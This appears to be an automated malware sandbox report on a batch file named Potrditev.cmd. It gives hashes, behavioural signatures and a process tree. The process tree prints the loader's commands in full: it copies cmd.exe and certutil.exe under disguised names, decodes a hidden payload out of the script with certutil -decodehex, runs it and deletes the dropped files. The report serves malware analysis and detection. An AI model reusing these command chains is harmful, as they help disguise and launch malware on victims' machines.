Analysis
max time kernel: 121s
max time network: 122s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 18/07/2024, 10:32
Static task: static1
Behavioral task: behavioral1
  Sample: Potrditev.cmd
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: Potrditev.cmd
  Resource: win10v2004-20240709-en
General
Target: Potrditev.cmd
Size: 2.8MB
MD5: 306e6e3743666b8f5fedb0127b041883
SHA1: 53ac1756ee69296be5f5c99ee18b1d1cb70369d4
SHA256: 20a156c7ad57c2c78a63e7f8d318d2bbba7e0d94186f92ef469aed643e1bf5cc
SHA512: 233d9861fe624b707fe4b89435cf27f1216006e97b97374fa159574d63ca6db351fc2cba454554c82d210ca6f8a4f8be383c6723eab0a54ac1a2e984317804c1
SSDEEP: 24576:RrZhKnjYBTiXW66DrApJCe4tnUNLgVaQzNqWDNRp6KNng1pyyIzmAZrQf3m29Yqk:Rr0jYNi8DrApkpUNLgVDzNVpeIh/c2B
Malware Config
Signatures
Executes dropped EXE 8 IoCs
  pid   Process
  2412  alpha.exe
  2060  alpha.exe
  1272  kn.exe
  2084  alpha.exe
  2936  kn.exe
  2696  CLEAN.COM
  2328  alpha.exe
  2712  alpha.exe
Loads dropped DLL 11 IoCs
  pid   Process
  2516  cmd.exe
  2516  cmd.exe
  2060  alpha.exe
  2516  cmd.exe
  2084  alpha.exe
  2516  cmd.exe
  2516  cmd.exe
  2476  WerFault.exe
  2476  WerFault.exe
  2476  WerFault.exe
  2476  WerFault.exe
Program crash 1 IoCs
  pid   pid_target  Process       procid_target
  2476  2696        WerFault.exe  38
Suspicious behavior: AddClipboardFormatListener 1 IoCs
  pid   Process
  1456  vlc.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  pid   Process
  2696  CLEAN.COM
Suspicious behavior: EnumeratesProcesses 62 IoCs
  pid   Process
  2608  taskmgr.exe  (repeated rows)
  1112  taskmgr.exe  (repeated rows)
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  pid   Process
  1112  taskmgr.exe
  1456  vlc.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
  description               pid   Process
  Token: SeDebugPrivilege   2608  taskmgr.exe
  Token: SeDebugPrivilege   1112  taskmgr.exe
Suspicious use of FindShellTrayWindow 64 IoCs
  pid   Process
  2608  taskmgr.exe  (repeated rows)
  1112  taskmgr.exe  (repeated rows)
Suspicious use of SendNotifyMessage 64 IoCs
  pid   Process
  2608  taskmgr.exe  (repeated rows)
  1112  taskmgr.exe  (repeated rows)
Suspicious use of SetWindowsHookEx 1 IoCs
  pid   Process
  1456  vlc.exe
Suspicious use of WriteProcessMemory 35 IoCs
  description                        pid   Process    procid_target
  PID 2516 wrote to memory of 1276   2516  cmd.exe    31  (x3)
  PID 2516 wrote to memory of 2412   2516  cmd.exe    32  (x3)
  PID 2412 wrote to memory of 2420   2412  alpha.exe  33  (x3)
  PID 2516 wrote to memory of 2060   2516  cmd.exe    34  (x3)
  PID 2060 wrote to memory of 1272   2060  alpha.exe  35  (x3)
  PID 2516 wrote to memory of 2084   2516  cmd.exe    36  (x3)
  PID 2084 wrote to memory of 2936   2084  alpha.exe  37  (x3)
  PID 2516 wrote to memory of 2696   2516  cmd.exe    38  (x4)
  PID 2516 wrote to memory of 2328   2516  cmd.exe    39  (x3)
  PID 2516 wrote to memory of 2712   2516  cmd.exe    40  (x3)
  PID 2696 wrote to memory of 2476   2696  CLEAN.COM  43  (x4)
Processes
C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2516

    C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      PID:1276

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID:2412

        C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          PID:2420

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID:2060

        C:\Users\Public\kn.exe
          C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
          - Executes dropped EXE
          PID:1272

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID:2084

        C:\Users\Public\kn.exe
          C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
          - Executes dropped EXE
          PID:2936

    C:\Users\Public\Libraries\CLEAN.COM
      C:\Users\Public\Libraries\CLEAN.COM
      - Executes dropped EXE
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of WriteProcessMemory
      PID:2696

        C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 716
          - Loads dropped DLL
          - Program crash
          PID:2476

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      - Executes dropped EXE
      PID:2328

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
      - Executes dropped EXE
      PID:2712

C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2608

C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1112

C:\Program Files\VideoLAN\VLC\vlc.exe
  "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\InvokeComplete.mpeg"
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1456
Network
MITRE ATT&CK Matrix
Downloads